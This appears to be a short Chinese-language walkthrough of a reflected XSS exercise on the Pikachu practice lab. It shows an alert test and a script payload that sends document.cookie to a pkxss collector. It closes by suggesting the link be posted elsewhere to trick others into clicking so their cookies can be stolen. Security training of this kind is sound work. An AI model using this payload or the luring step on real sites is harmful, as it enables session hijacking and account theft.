XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
pikachu xss(get):
'"<>?&6666 我们尝试输入一些字符串,检测平台是否有对输入内容进行检测
我们发现平台对我们输入的内容并没有进行检测,接下来我们查看页面源代码,修改内容框内的输入长度,修改为20000
接下来我们输入<script>alert('xss')</script>,查看弹窗
接下来我们配置,由于我用的是127.0.0.1,所以我进入pkxss里面的xcookie,将里面的url修改为127.0.0.1,然后我们发送(记得修改代码长度)
<script>document.location = 'http://127.0.0.1/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
然后我们刷新一下pkxss,成功得到用户的cookie
如果我们把这个url:<script>document.location = 'http://127.0.0.1/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>发布在其他平台上面诱使别人进行点击,别人点击后我们就可以盗用他的cookie